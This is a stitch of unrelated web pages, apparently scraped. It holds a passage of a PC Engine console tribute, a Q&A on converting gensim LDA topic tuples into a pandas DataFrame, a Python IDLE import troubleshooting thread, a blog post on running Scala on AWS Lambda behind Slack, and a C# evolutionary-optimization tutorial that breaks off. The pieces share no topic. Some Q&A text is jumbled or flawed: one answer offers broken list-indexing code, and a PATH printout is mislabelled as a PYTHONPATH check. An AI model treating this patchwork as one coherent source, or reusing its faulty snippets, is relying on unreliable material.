Calling the system “the grandfather of the 16-bit era” is a bit of a misnomer, though, as the hardware was actually driven by an 8-bit CPU, as we will see in more detail further on. Regardless, in 1987 its specs looked fantastic, and so did its graphics. By the time it was released in the States in 1989, however, other companies had not only caught up but also surpassed its hardware capabilities. The most prominent of these competitors was Sega, who had released the hardware beast that was the Genesis/Mega Drive just a couple of months before. This made the TurboGrafx, as the PC Engine came to be known stateside, a bit of a niche system outside its native land. The hardware was just not good enough to compete with the Genesis or Nintendo’s Super NES, and the market quickly moved on to these two latter systems. The 16-bit era console war was fought throughout the ‘90s by the two giants, Nintendo and Sega, with massive marketing budgets and a slew of games to back up their respective claims, leaving the poor PC Engine behind. Nevertheless, the broader success at home ensured high quality games were still made for the system, including fairly accurate and enjoyable ports of arcade blockbusters such as Street Fighter II and Ghouls ‘n’ Ghosts. Before we get to the games, however, let’s talk about the PC Engine’s hardware and physical design, especially the weaknesses against its contemporary competitors which undermined the system’s success in the market.

Hardware

The main hardware drawback of the PC Engine was its CPU, an 8-bit MOS 6502 derivative; it was close in design to Nintendo’s much older NES, although clocked at almost 4x the speed. This shortcoming was somewhat redeemed by flanking the main processor with reasonably powerful 16-bit custom graphics chips capable of displaying up to 482 colors on screen (out of a palette of 512).
On the sound front, chirpy chip tunes were provided by a decent sound system integrated into the CPU itself ³, effectively producing sound and music which were on par with the console’s main competitors. In contrast, both the Genesis and the Super NES employed real 16-bit architectures, each with its own way of ensuring graceful aging: the Sega system offered overpowered hardware from the get-go, while Nintendo allowed hardware enhancements to be built right into the cartridges. The other major drawback of the system is less to do with hardware power and more to do with UX. The console came with a single gamepad port, where all of its competitors offered two out of the box. In order to play games with your friends, you had to get a multitap accessory which, although allowing support for up to 5 players, was just an annoying extra expense for anybody looking for a quick Street Fighter II duel. The controllers themselves were also short on face buttons: at launch, the PC Engine had a meagre two, whereas the Genesis had three and the SNES four (plus two shoulder buttons). A six-button pad was only released much later in the system’s life, to coincide with the release of Street Fighter II and around the time when Sega also upgraded their controller design to a six-button layout. Despite all these flaws, and thanks to the popularity of the system in Japan, several revisions and enhancements were released throughout the years until the console’s ultimate demise in 1994. Some of these enhancements were revolutionary in their own right, such as the CD-ROM player released in late 1988, offering the first instance in history of the gaming experience which would become familiar in the second half of the 1990s and throughout the 2000s.
Console design

Although the chassis of the American version was somewhat conservative and in line with the common industrial design of its time, the Japanese original was more innovative and quite daring in its form factor. Sporting a broadly white and minimalist color scheme, the base console was roughly the size of a stack of four CD jewel cases, making for a very compact system unlike anything else on the market; this was years before Nintendo tried something vaguely similar with their GameCube, and later again with the Wii. This diminutive size was in part enabled by the physical form factor of the game cartridges. Whereas Nintendo and Sega distributed their games on boxy, chunky hunks of plastic, the folks at NEC/Hudson opted for a slimmer design that was vaguely reminiscent of a standard credit card, if somewhat thicker. This all contributed to the look of a futuristic console which would have felt right at home on the piloting deck of a Mech Robot, but still somewhat held back by a less inspired control pad design.

The games

Lacking an exclusive franchise along the lines of Sonic or Mario, the strength of the PC Engine lay mainly in its arcade ports, complemented by a collection of JRPGs which included Ys and Far East of Eden. In fact, the selection of games for the PC Engine Mini is a good representation of what was available for the system, save a couple of glaring omissions (where is Street Fighter II?!). Here are a few titles taken from the TurboGrafx Mini list, which provide a fair insight into the library of 600-odd titles available for the system.

PC Genjin/Bonk’s Adventure

A fun platformer starring a bald caveman which was slated to become the console’s mascot. It did not happen. This game was eventually ported to other systems of the era, with the protagonist’s name being adapted to its new hosts (PC Genjin being a pun on PC Engine).
Neutopia

Somewhat reminiscent of The Legend of Zelda, this is a top-down action RPG with beautiful graphics that show the capabilities of the system. However, you must really be into dungeon exploration to enjoy this game, as it’s quite repetitive. If that’s not your thing but you still want a solid RPG experience, Ys I/II might be a better choice.

Salamander

A great example of the arcade conversions available for this console. Salamander is a classic shoot-em-up that includes both horizontal and vertical scrolling stages. The PC Engine version remains faithful to the original by sporting awesome graphics and captivating sound. It’s damn hard though. Warning: this game is only available in the European and US versions of the Mini console. The Japanese version includes Far East of Eden instead.

Bomberman ‘93

A port of the famous multiplayer battle game. Good graphics and hours of fun guaranteed, especially if playing in groups. Note that a multitap is required for group play on the original PC Engine, while the Mini version supports 2 simultaneous players directly (an adapter is still sold separately to allow additional players).

Super Momotarō Dentetsu II

For something out of left field, try this game. It’s a dice-based board game where the main objective is to accumulate wealth in a similar style to Monopoly. An understanding of Japanese is necessary to get anywhere, and up to 5 players are supported.

My own take on the system

It’s no secret that I love the PC Engine. I love its compact design, its simplicity, and its mini game cartridges that are even more compact than the classic Game Boy ones. Although I never owned the original back in the day, it is a system I always admired throughout the years, mainly because of its imperfections and limitations, straddling the line between 8-bit and 16-bit consoles, as a somewhat poetic instance of wabi-sabi ⁴ in electronics.
My only disappointment in the Mini release is the lack of my favorite game for the system: Doraemon: Meikyū Daisakusen, released in the US under the name Crater Maze, with different graphics. The Japanese version sports the popular blue cat from the famous manga/anime franchise going around a maze and collecting his favorite pancakes while setting up booby traps to avoid all sorts of ridiculous enemies. This game is a variation of the popular Kid no Hore Hore Daisakusen for the arcade, also ported to the NES and the Game Boy. The main attraction of this port is of course Doraemon being the hero here.

Will the Mini succeed?

There are many factors coming into play to determine the commercial success of this machine, especially outside Japan, as the system was not that popular worldwide. My expectation is that public reception will mainly be based on the following factors.

Aesthetics/build quality

It’s easy to emulate the PC Engine, and it’s also easy to find most of its best games on other systems. The console will only be successful if it has a good build quality while faithfully reproducing the original. I have a Nintendo Super Famicom Classic that I bought in Japan and it is excellent in that respect. I don’t play it much, but it’s good to look at.

Software

One of the strengths of the SNES and NES Classic is the system software which presents the game catalog and deals with game saves. This can make or break the system, and I hope Konami’s implementation will follow closely in Nintendo’s footsteps, although I admit the SNES/NES Classic UI has a distinctive Nintendo feel to it.

Emulation

I don’t expect the system to have the same slowdown/stuttering problems as the PlayStation Classic, as the hardware requirements to emulate the PC Engine are much lower. A good execution of the gameplay experience is essential to the success of the console. I don’t foresee any problems in this area.
Game selection

The games announced for the system are, as I said earlier, a good representation of what was available. However, in the end you only get around 30 unique titles to choose from. Is that enough? Not sure, maybe not. A unique point about the game library is that all three versions of the console (US, Europe and Japan) will come preloaded with a selection of games that covers all worldwide regions. This means that some Japanese games will be available officially for the first time outside Japan, and vice versa. Again, this might be a selling point for collectors, though I am not sure about the relevance for a casual player. In conclusion, yes, the PC Engine is a niche system and its broader appeal is somewhat limited, especially outside of Japan. Its MSRP is also quite high at the moment at US$99/GB£99/JP¥11,550, further reducing its potential for mass adoption. Perhaps a drop to a more realistic US$59 would entice more non-Japanese gamers to part with their cash and give it a go. Having said that, its unique position in history and characteristic physical design might be enough to win over a new generation of fans, or entice a purchase from those who, like me, missed out on the original system back in the day.

Will I buy it?

Yes, in a heartbeat. I am going to order the PC Engine version from Amazon Japan, and probably start with the English version of Ys as soon as it arrives, followed by a few rounds of R-Type. I still wish they had included Street Fighter II though.

References

[1] Six Months Financial Results Briefing for Fiscal Year Ending March 2019, Nintendo [PDF]
[2] Based on sales figures from Video Game Sales Wiki [Website]
[3] Specs from NECRetro.ORG, PC Engine [Website]
[4] Wikipedia, Wabi-Sabi [Website]
https://medium.com/super-jump/a-tribute-to-the-pc-engine-badd2369fe7c?source=collection_home---2------0-----------------------
Problem: I want to convert a list of lists into a dataframe.

Setup: I have the following list:

    data = [[(1,0.8),(2,0.2)],
            [(0,0.1),(1,0.3),(2,0.6)],
            [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]]

This is an LDA document-topic probability list from gensim in which each list is a document and each tuple is one of five topic probabilities. (See an earlier question I posted on Stack Overflow here.) The first element in the tuple is the topic number, the second element is the topic probability for the document. Note that while some documents (like the 3rd list) can have up to five tuples (topic probabilities), gensim LDA does not output probabilities for topics with less than 0.01 probability. Therefore, examples like document 1 and document 2 have fewer than five tuples.

Goal: Use for loops to create a document-topic probability matrix such that:

    ProbMatrix = [(0,0.8,0.2,0,0),
                  (0.1,0.3,0.6,0,0),
                  (0.05,0.05,0.3,0.4,0.2)]

As noted above, for "missing" tuples (topics), zeros need to be plugged in. Once I get this list, I figure I can use the pandas DataFrame function to produce my final output (df) such that:

    df = pd.DataFrame(ProbMatrix)

My (Failed) Attempt:

    ProbMatrix = []
    for i in data:  # each document i
        for j in i:  # each topic j
            if j[0] == 0:
                ProbMatrix[i,0].append(j[1])
            elif j[0] == 1:
                ProbMatrix[i,1].append(j[1])
            elif j[0] == 2:
                ProbMatrix[i,2].append(j[1])
            elif j[0] == 3:
                ProbMatrix[i,3].append(j[1])
            elif j[0] == 4:
                ProbMatrix[i,4].append(j[1])

The problem is how I'm referencing ProbMatrix, because I'm receiving the following error:

    TypeError: list indices must be integers, not tuple

Thank you for your help!

Bonus (that is, it'd be even better if you can help): One problem I've found with gensim LDA is that, as mentioned, it does not output probabilities less than 0.01, even if minimum_probability = None. For example, see this earlier post. The example above is illustrative in that the topic probabilities sum to 1 for each document.
However, in reality the output looks more like this:

    data = [[(1,0.79),(2,0.2)],          # topic 1 probability 0.79 instead of 0.8
            [(0,0.09),(1,0.3),(2,0.6)],  # topic 0 probability 0.09 instead of 0.1
            [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]]

What I'm looking for is, instead of putting zero into unknown topic probabilities, to give the remaining missing topics an even share of the leftover probability, such that the topic probabilities for each document sum to 1. For example, this would result in a ProbMatrix:

    ProbMatrix = [(0.0033,0.79,0.2,0.0033,0.0033),
                  (0.09,0.3,0.6,0.005,0.005),
                  (0.05,0.05,0.3,0.4,0.2)]

I'm not 100% sure what you are asking, but I think this is what you are looking for to get the ProbMatrix list you showed. You can do it like this:

    data = [[(1,0.8),(2,0.2)],
            [(0,0.1),(1,0.3),(2,0.6)],
            [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]]

    probmatrix = []
    for i in data:
        tmp = [0,0,0,0,0]
        for j in i:
            tmp[j[0]] = j[1]
        probmatrix.append(tmp)

    df = pd.DataFrame(probmatrix)
    print df

          0     1    2    3    4
    0  0.00  0.80  0.2  0.0  0.0
    1  0.10  0.30  0.6  0.0  0.0
    2  0.05  0.05  0.3  0.4  0.2

Since you know there will only be five elements, you can make a tmp list initialized with 5 zeros and just replace the ones that are non-zero.

Not sure if it's what you want, but i is a document, and you are using it to address ProbMatrix. You can make ProbMatrix = {} instead of ProbMatrix = [] to use it as a dictionary. You cannot reference a list of lists with [i,j]; in your case it's a list of tuples. You should first have a list of lists. Try:

    ProbMatrix[i].append(j[1])  # add a number to the list at row i

Maybe I didn't get why you need 2 indices. In this case it should be:

    ProbMatrix[i][j].append(j[1])

If you know the desired shape of your output, you can use np.zeros to create a zero-filled NumPy array and fill accordingly.
    import numpy as np
    import pandas as pd

    probMatrix = np.zeros(shape=(3,5))  # size of (num docs, k topics)

    for doc_num, probs in enumerate(data):
        for k_index, prob in probs:
            probMatrix[doc_num, k_index] = prob

Which will return:

    array([[ 0.  ,  0.8 ,  0.2 ,  0.  ,  0.  ],
           [ 0.1 ,  0.3 ,  0.6 ,  0.  ,  0.  ],
           [ 0.05,  0.05,  0.3 ,  0.4 ,  0.2 ]])

Which can be loaded directly into a pandas dataframe if needed, or is pretty useful just as it is.
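None of the answers address the bonus question. Here is a sketch of one way to handle it, spreading the leftover probability mass evenly over the topics gensim omitted so that each row sums to 1 (the function name prob_rows and the k=5 default are my own, not from the question):

```python
def prob_rows(data, k=5):
    """Build document-topic rows; any probability mass gensim dropped
    (because it was below 0.01) is split evenly over the missing topics
    so each row sums to 1."""
    rows = []
    for doc in data:
        row = [0.0] * k
        for topic, p in doc:
            row[topic] = p
        # topics gensim did not report for this document
        missing = [t for t in range(k) if row[t] == 0.0]
        leftover = 1.0 - sum(row)
        if missing and leftover > 0:
            for t in missing:
                row[t] = leftover / len(missing)
        rows.append(row)
    return rows

data = [[(1, 0.79), (2, 0.2)],
        [(0, 0.09), (1, 0.3), (2, 0.6)],
        [(0, 0.05), (1, 0.05), (2, 0.3), (3, 0.4), (4, 0.2)]]

rows = prob_rows(data)
```

The result can be handed straight to pd.DataFrame(rows), as in the first answer.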
http://m.dlxedu.com/m/askdetail/3/c49c828ae4d9a486f1ff539a936c711d.html
UPDATE (10 secs later): Fixed properly now, and thanks to JF and Gauden.

UPDATE: I have found a temporary fix by saving the IDLE file in the directory the other working file is in. (I would still like to know how to fix it entirely if I can.) That's not a permanent fix, so if you want to try and help make it work wherever the file is saved, feel free.

This is the start of a python file:

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import wikipedia
    import pagegenerators
    import sys
    import re
    import pywikibot
    from pywikibot import *

In IDLE, importing wikipedia fails:

    >>> import wikipedia
    Traceback (most recent call last):
      File "<pyshell#9>", line 1, in <module>
        import wikipedia
    ImportError: No module named wikipedia

    >>> imp.find_module("wikipedia.py","f:/ake/pa/th/")
    Traceback (most recent call last):
      File "<pyshell#7>", line 1, in <module>
        imp.find_module("wikipedia.py","f:/ake/pa/th/")
    ImportError: No frozen submodule named f:/ake/pa/th/.wikipedia.py

I also tried appending the directory containing wikipedia.py to sys.path:

    >>> import sys
    >>> sys.path.append("c/users/adam/py")
    # the same error...

The interpreters involved are:

    C:\Python27\python.exe
    C:\Python27\pythonw.exe

Checking PYTHONPATH gives:

    Traceback (most recent call last):
      File "<pyshell#20>", line 1, in <module>
        print os.environ['PYTHONPATH'].split(os.pathsep)
      File "C:\Python27\lib\os.py", line 423, in __getitem__
        return self.data[key.upper()]
    KeyError: 'PYTHONPATH'

The PATH contains, among others:

    C:\Program Files\Common Files\Microsoft Shared\Windows Live
    C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live
    C://Python27
    C:\Program Files (x86)\IVI Foundation\VISA\WinNT\Bin
    C:\Program Files (x86)\QuickTime\QTSystem\
    C:\Program Files (x86)\Windows Live\Shared

EDIT: The answer to the above question proved to be fairly simple, but I am editing this answer as a possible troubleshooting checklist for future reference, and as a checklist for others who may need to prepare questions of this nature in the future.

    >>> import wikipedia
    >>> print wikipedia.__file__

This will give you the path to the compiled module, and is one clue. (See also this question.)
    >>> import sys
    >>> print sys.executable

Try this in the shell and in an IDLE script. If the two results are different, then you are using two Python interpreters and only one of them has a path that points to the wikipedia module.

sys.path? Also repeat this in both shell and as a script in IDLE:

    >>> print '\n'.join( sys.path )

(You may be able to use sys.path.append("d:/irectory/folder/is/in") to add that location to the sys.path. This should add that directory to the list of places Python looks for modules.)

Finally, repeat this in both shell and as a script in IDLE:

    >>> import os
    >>> print '\n'.join( os.environ['PATH'].split(os.pathsep) )

Again note the two results (from shell and from IDLE) and see if there is a difference in the PYTHONPATH in the two environments. If all these tests prove inconclusive, I would add as much of this information as you can to your question, as it would help give you specific further leads. Also add what OS you are using and any tracebacks that you get.
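The checklist above can be bundled into one small script and run once from the shell and once from an IDLE script to compare the two environments. This is my own sketch (the function name diagnose is made up), written for Python 3; note the use of os.environ.get, which avoids the KeyError the asker hit when PYTHONPATH is unset:

```python
import os
import sys

def diagnose(module_name):
    """Print the interpreter/path facts the checklist compares, and
    report whether module_name is importable from this interpreter."""
    print("executable:", sys.executable)
    print("sys.path:")
    for p in sys.path:
        print(" ", p)
    # .get avoids the KeyError raised by os.environ['PYTHONPATH']
    print("PYTHONPATH:", os.environ.get("PYTHONPATH", "<not set>"))
    try:
        mod = __import__(module_name)
        print(module_name, "found at", getattr(mod, "__file__", "<built-in>"))
        return True
    except ImportError:
        print(module_name, "is NOT importable from this interpreter")
        return False
```

Running diagnose("wikipedia") in both environments makes any difference between the two interpreters obvious at a glance.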
https://codedump.io/share/MMnEARGWJzMk/1/imports-working-with-raw-file-but-not-in-idle
AWS Lambda is a service that allows you to deploy a function to the web. There are no servers to maintain, and billing is based on the compute time your function uses. At the end of 2015, Amazon launched a set of AWS Lambda blueprints to help developers get up and running with Lambda. These consist of Python and JavaScript examples, based around integrating with Slack (“chat-based DevOps”, in their words). But Amazon omitted to mention the JVM. This post fills the gap and shows you how to use AWS Lambda with Scala and Slack.

What we’re going to make

The Amazon blueprints echo back what you type into Slack. I want to do something more useful than that. I want this kind of interaction: I ask for the time in a bunch of places via /time place-name and my AWS Lambda function sends back the current time in all those places.

Lambda and the API gateway

Using AWS Lambda to do this involves three things:

- configuring Slack to recognize the command;
- writing some code; and
- deploying the code to AWS Lambda.

To be more precise, AWS Lambda is a compute service, not a web service. What triggers the computation is an event. That can be something like an object being changed in an S3 bucket. For the blueprint examples to integrate with Slack, they have to be triggered from a web request. Here’s the scenario:

- I type /time new-york in Slack;
- Slack is configured to send information about the command to a web service; and
- Slack shows me the output from calling the web service.

To trigger a Lambda via the web you need the Amazon API Gateway. That’s what the blueprints use.

Scala code

Before we dig into the deployment details, let’s deal with the easiest part: the Scala code. The first question you probably have is: what’s the type signature of the Lambda? Amazon will recognize a range of type signatures, but at the core the service is a transformation from JSON to JSON. There’s automatic serialization for various data types, but they are focused on Java conventions.
As a Scala developer, I don’t make a lot of use of JavaBeans, so I’m going to work with the raw input and output:

    import java.io.{InputStream, OutputStream}

    def time(in: InputStream, out: OutputStream): Unit = ???

Not the prettiest thing, but something we can work with. The in stream will be JSON as text; and the out stream will be JSON as text. The example code I’ve put on GitHub does this:

- Reads the input stream.
- Uses Circe to decode it into a case class.
- Extracts what it needs, and produces another case class with all the results in it.
- Uses Circe again to serialize the results back as JSON to Amazon, and from there onward to Slack.

The Lambda function runs on a Java 8 JVM, and I use the built-in java.time API to compute all the different time information.

Deployment

To deploy the code we need to package it, and we need something to deploy it to. The packaging is done with sbt-assembly, as Tim Wagner and Sean Reque have done in their example for S3. This produces a JAR file. To deploy it, you can create a Lambda environment and connect it to the API Gateway. But there’s a trick you can use to save some time. In the AWS Lambda Console, use the existing “slack-echo-command-python” example, and at the last step switch from Python to Java 8. You’ll be prompted to upload a JAR file. If all goes well, you’ll end up with an API Gateway that looks like this:

The “Integration Request” has some interesting settings, which we will now take a look at.

The web is not JSON

This is the messy part. AWS Lambda is based on JSON, but the web is not all about JSON. In fact, the Slack service posts standard web form data, not JSON. We need to convert it to JSON before our Lambda function is called. This can be handled by the AWS API Gateway’s “mapping template” functionality. Hold your nose, because this smells. For us, we need to go from the x-www-form-urlencoded data that Slack sends us into JSON:

That stuff on the right is Velocity markup.
Amazon have a scripting engine which you can use to re-write a web request into JSON. Thankfully, Christian E Willman has figured out what that template should be. And I’ve started a rudimentary emulation of the Amazon Mapping Template environment to be able to debug these kinds of templates. As terrifying as that is, it does turn a request into JSON. Hopefully Amazon will add support for form encoding to Lambda one day.

The final step: plugging in Slack

Configuring a new command in Slack is best explained by Slack. The one thing you need is the Amazon Gateway URI to your Lambda service. It’s shown in the AWS API Gateway Dashboard.

Summary

With those pieces in place, we have deployed a JAR file containing a Scala function to AWS Lambda. We’ve wired up Slack to call the function, and arranged for the API Gateway to turn Slack’s form data into JSON. In theory, our function can now scale out to as many clients as Amazon can support. That should be a pretty big number. As for performance, I only have informal information at the moment. The function typically executes in something like 80ms. However, there’s a great deal of variation in that. For a cold start, if no requests have been seen for some time, those values go to almost 3s. AWS Lambda works. You can use it with Scala, and it may play an important role in web development. I can see the immediate benefit for micro-sites and services, as well as for scheduled work or work reacting to other events.
http://underscore.io/blog/posts/2016/02/01/aws-lambda.html
The Data Science Lab

Resident data scientist Dr. James McCaffrey of Microsoft Research turns his attention to evolutionary optimization, using a full code download, screenshots and graphics to explain this machine learning technique used to train many types of models by modeling the biological processes of natural selection, evolution, and mutation.

Evolutionary optimization is a technique that can be used to train many types of machine learning models. Evolutionary optimization loosely models the biological processes of natural selection, evolution, and mutation. Although it's possible to learn about evolutionary optimization by seeing how it works with an abstract problem, in my opinion it's better to start with a concrete example. In this article I demonstrate how to use evolutionary optimization to train a logistic regression model. Along the way, I'll explain how to adapt the example to other types of machine learning models. Logistic regression classification is arguably the most fundamental machine learning technique. Logistic regression can be used for binary classification, for example predicting if a person is male or female based on predictors such as age, height, weight, and so on. Take a look at the demo program in the screenshot in Figure 1. The goal of the demo is to predict the authenticity of a banknote (think dollar bill or euro) based on four predictor values (variance, skewness, kurtosis, entropy). The demo sets up a population of six possible solutions, then uses eight generations of evolutionary optimization to find successively better solutions. Behind the scenes, the demo program sets up a training dataset of 40 items. In the first generation, the best solution is at [5] in the population and that solution has prediction accuracy of 60 percent (24 correct, 16 wrong) and error of 0.2266. After eight generations of evolution, a solution is found that scores 87.50 percent accuracy (35 correct, 5 wrong) with 0.0956 error.
The demo concludes by displaying the four weights and one bias value for a logistic regression model: (-0.9435, -0.8266, -0.2915, -0.6601, -0.0369). In a non-demo scenario, these values would be used to make a prediction, or be saved to file for later use. This article assumes you have intermediate or better skill with C# and a basic understanding of logistic regression, but doesn't assume you know anything about evolutionary optimization. The code for the demo program is a bit too long to present in its entirety in this article, but the complete code is available in the associated file download.

Understanding the Data

The demo program uses a small 40-item subset of a well-known benchmark collection of data called the Banknote Authenticity Dataset. The full dataset has 1,372 items, with 762 authentic and 610 forgery items. You can find the complete dataset in many places on the Internet. The raw data looks like:

    3.6216, 8.6661, -2.8073, -0.44699, 0
    4.5459, 8.1674, -2.4586, -1.4621, 0
    . . .
    -3.5637, -8.3827, 12.393, -1.2823, 1
    -2.5419, -0.65804, 2.6842, 1.1952, 1

Each line represents a banknote. The first four values on each line are characteristics of a digital image of the banknote: variance, skewness, kurtosis, and entropy. The fifth value on a line is 0 for an authentic note and 1 for a forgery. The demo program uses only the first 20 authentic notes and the first 20 forgeries of the full dataset. A graph of the 40 data items used in the demo shows that classifying a banknote as authentic or forgery is a fairly difficult problem.

Quick Summary of Logistic Regression Classification

Logistic regression classification is relatively simple. For a dataset with n predictor variables, there will be n weights plus one special weight called a bias. Weights and biases are just numeric constants with values like -1.2345 and 0.9876. To make a prediction, you sum the products of each predictor value and its associated weight and then add the bias.
The sum is often given the symbol z. Then you take the logistic sigmoid of z to get a p-value. If the p-value is less than 0.5 then the prediction is class 0, and if the p-value is greater than or equal to 0.5 then the prediction is class 1. For example, suppose you have a dataset with three predictor variables, and suppose that the three associated weight values are (0.20, -0.40, 0.30) and the bias value is 1.10. If an item to predict has values (5.0, 6.0, 7.0) then:

    z = (0.20 * 5.0) + (-0.40 * 6.0) + (0.30 * 7.0) + 1.10 = 1.80
    p = 1.0 / (1.0 + exp(-1.80)) = 0.8581

Because p is greater than or equal to 0.5 the predicted class is 1. The function f(x) = 1.0 / (1.0 + exp(-x)) is called the logistic sigmoid function. The function exp(x) is Euler's number, approximately 2.718, raised to the power of x. Determining the values of the weights and bias is called training the model. In addition to evolutionary optimization, there are many other techniques that can be used to train a logistic regression model. Three common training techniques for logistic regression are stochastic gradient descent (SGD), iterated Newton-Raphson, and L-BFGS optimization.

Understanding Evolutionary Optimization

The images in Figure 3 illustrate the key ideas of evolutionary optimization. Because the banknote data has four predictors/features, a logistic regression model solution will have five values: four weights and one bias. Evolutionary optimization creates a population of solutions. The demo uses a population size of six. Each solution has an associated error. The demo uses mean squared error between computed outputs (values between 0.0 and 1.0) and correct outputs (0 or 1). Evolutionary optimization is an iterative process.
In pseudo-code:

create a population of (random) solutions
loop maxGen times
  pick two good solutions
  use good solutions to create a child solution
  mutate child slightly
  replace a bad solution with child solution
  create a random solution
  replace a bad solution with the random solution
end-loop
return best solution found

If parent1 and parent2 are two good (low error) solutions in the population, to create a child solution you start by generating a random crossover index. Then the child receives the values from the left part of parent1 and the right part of parent2. An alternative approach is to create a second child with the right part of parent1 and the left part of parent2.

Mutation is an important part of evolutionary optimization. The approach used in the demo program is:

loop each cell of child solution
  generate a random probability p
  if p is small, give cell a new random value
end-loop

A key task when using evolutionary optimization is selecting relatively good and bad solutions, so that you can use good solutions to generate a new child solution, and you can replace a bad solution with a child solution or a new random solution. The demo program uses a technique called tournament selection. To select a good solution:

set alpha = value between 0 percent and 100 percent
select a random alpha-percent subset of population indices
return best index (lowest error) of subset

Suppose, as in the demo, the population size is six, so the indices of the population are (0, 1, 2, 3, 4, 5). And suppose alpha is set to 0.50. This means that a random 0.50 * 6 = 3 indices are selected, for example, (4, 0, 2). From these three, the solution with the lowest error is selected.

The alpha parameter is called the selection pressure. The larger alpha is, the more likely you are to get the absolute best solution in the population. A good value for alpha is problem-dependent and must be determined by trial and error, but 0.80 is a reasonable value to start with.
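The tournament selection scheme just described can be sketched in Python (a minimal illustration; the function and variable names are mine, not the demo program's):

```python
import random

def select_good(errors, alpha, rnd):
    # pick a random alpha-percent subset of population indices,
    # then return the index with the lowest error in that subset
    n = max(1, int(alpha * len(errors)))
    indices = list(range(len(errors)))
    rnd.shuffle(indices)              # Fisher-Yates shuffle
    subset = indices[:n]
    return min(subset, key=lambda i: errors[i])

def select_bad(errors, alpha, rnd):
    # identical sampling, but return the highest-error index
    n = max(1, int(alpha * len(errors)))
    indices = list(range(len(errors)))
    rnd.shuffle(indices)
    subset = indices[:n]
    return max(subset, key=lambda i: errors[i])

rnd = random.Random(0)
errors = [0.30, 0.10, 0.50, 0.20, 0.40, 0.60]
# index of the lowest-error solution among a random half of the population
print(select_good(errors, 0.50, rnd))
```

With alpha = 1.0 the whole population is sampled, so select_good() always returns the global best index and select_bad() the global worst; smaller alpha values loosen that pressure.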
To select a random subset of size n from all population indices, the demo program starts with all indices (0, 1, 2, 3, 4, 5), shuffles the indices using the Fisher-Yates mini-algorithm, giving for example (3, 5, 0, 1, 4, 2), and then returns the first n indices (3, 5, 0). Simple and effective. Selecting the index of a relatively bad solution is exactly like selecting a good solution, except that after sampling you return the index of the solution that has the highest error.

I named the demo project "LogisticEvo" and renamed the template-generated code file to LogisticEvoProgram.cs, and then in the editor window I renamed class Program to class LogisticEvoProgram to match the file name. The structure of the demo program, with a few minor edits to save space, is shown in Listing 1.

Listing 1. Evolutionary Optimization Demo Program Structure

using System;
namespace LogisticEvo
{
  class LogisticEvoProgram
  {
    static void Main(string[] args)
    {
      Console.WriteLine("Evolutionary optimization");
      Console.WriteLine("Banknote authenticity");

      // Banknote Authentication subset
      double[][] trainX = new double[40][];
      trainX[0] = new double[] { 3.6216, 8.6661, -2.8073, -0.44699 };
      trainX[1] = new double[] { 4.5459, 8.1674, -2.4586, -1.4621 };
      . . .
      trainX[38] = new double[] { -3.5801, -12.9309, 13.1779, -2.5677 };
      trainX[39] = new double[] { -1.8219, -6.8824, 5.4681, 0.057313 };

      int[] trainY = new int[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 };

      . . . // hyperparameter setup and call to Train() elided

      Console.WriteLine("Best weights found:");
      ShowVector(wts);

      Console.WriteLine("End demo ");
      Console.ReadLine();
    } // Main

    static double[] Train(double[][] trainX, int[] trainY,
      int popSize, int maxGen, double alpha, double sigma,
      double omega, double mRate, int seed) { . . }
    static double[] MakeSolution(int nw, Random rnd) { . . }
    static double[][] MakePopulation(int popSize, int nw, Random rnd) { . . }
    static double[] MakeChild(double[][] pop, int[] parents, Random rnd) { . . }
    static void Mutate(double[] child, double mRate, Random rnd) { . . }
    static int BestSolution(double[] errors) { . . }
    static int SelectGood(double[] errors, double pct, Random rnd) { . . }
    static int[] SelectTwo(double[] errors, double pct, Random rnd) { . . }
    static int SelectBad(double[] errors, double pct, Random rnd) { . . }
    static void Shuffle(int[] vec, Random rnd) { . . }
    static double ComputeOutput(double[] x, double[] wts) { . . }
    static double LogSig(double x) { . . }
    static double Accuracy(double[][] dataX, int[] dataY, double[] wts) { . . }
    static double Error(double[][] dataX, int[] dataY, double[] wts) { . . }
    static void ShowVector(double[] v) { . . }
  }
} // ns

The program isn't as complicated as it might appear because most of the functions are relatively small and simple helpers. All of the program logic is contained in the Main() method. The demo uses a static method approach rather than an OOP approach for simplicity. All normal error checking has been removed to keep the main ideas as clear as possible.

The demo begins by setting up the 40-item training data:

double[][] trainX = new double[40][];
trainX[0] = new double[] { 3.6216, 8.6661, -2.8073, -0.44699 };
. .
trainX[39] = new double[] { -1.8219, -6.8824, 5.4681, 0.057313 };
int[] trainY = new int[40] { 0, 0, . . 1 };

In a non-demo scenario you'd likely want to store your training data as a text file, and then you'd read the training data into memory using helper functions along the lines of:

double[][] trainX = MatLoad("..\\trainData.txt",
  new int[] { 0, 1, 2, 3 }, ",");
int[] trainY = VecLoad("..\\trainData.txt", 4, ",");

Because of the way logistic regression classification output is computed, it's almost always a good idea to normalize your training data so that small predictor values (such as an age of 35) aren't overwhelmed by large predictor values (such as an annual income of 65,000.00).
The three most common normalization techniques are min-max normalization, z-score normalization, and order of magnitude normalization. Because the banknote predictor values are all roughly within the same magnitude, the demo does not normalize the training data.

After setting up the training data, the demo program trains the model by assigning values to the hyperparameters and calling the Train() function:

double[] wts = Train(trainX, trainY, popSize, maxGen,
  alpha, sigma, omega, mRate, seed);

The population size and maximum number of generations to evolve are hyperparameters that must be determined by trial and error. The values of hyperparameters alpha, sigma, and omega control selection pressure for picking good parents to breed, picking a bad solution for replacement by a child, and picking a bad solution for replacement by a new random solution. The mutation rate controls how many cells in a newly created child solution will be randomly mutated. In my experience, of the six training hyperparameters, evolutionary optimization is more sensitive to the mutation rate than to the other parameters. The Train() function accepts a seed value, which is used to create a local Random object. The seed value in the demo, 3, was used only because it gave a representative result.

Implementation Details
The demo program defines a MakeSolution() function like so:

static double[] MakeSolution(int nw, Random rnd)
{
  double lo = -1.0; double hi = 1.0;
  double[] soln = new double[nw];
  for (int i = 0; i < nw; ++i)
    soln[i] = (hi - lo) * rnd.NextDouble() + lo;
  return soln;
}

The function creates a vector with a size equal to the number of weights (including the bias) needed for a logistic regression problem. Each cell of the vector holds a random value in the range [-1.0, +1.0], which is a problem-dependent hyperparameter.
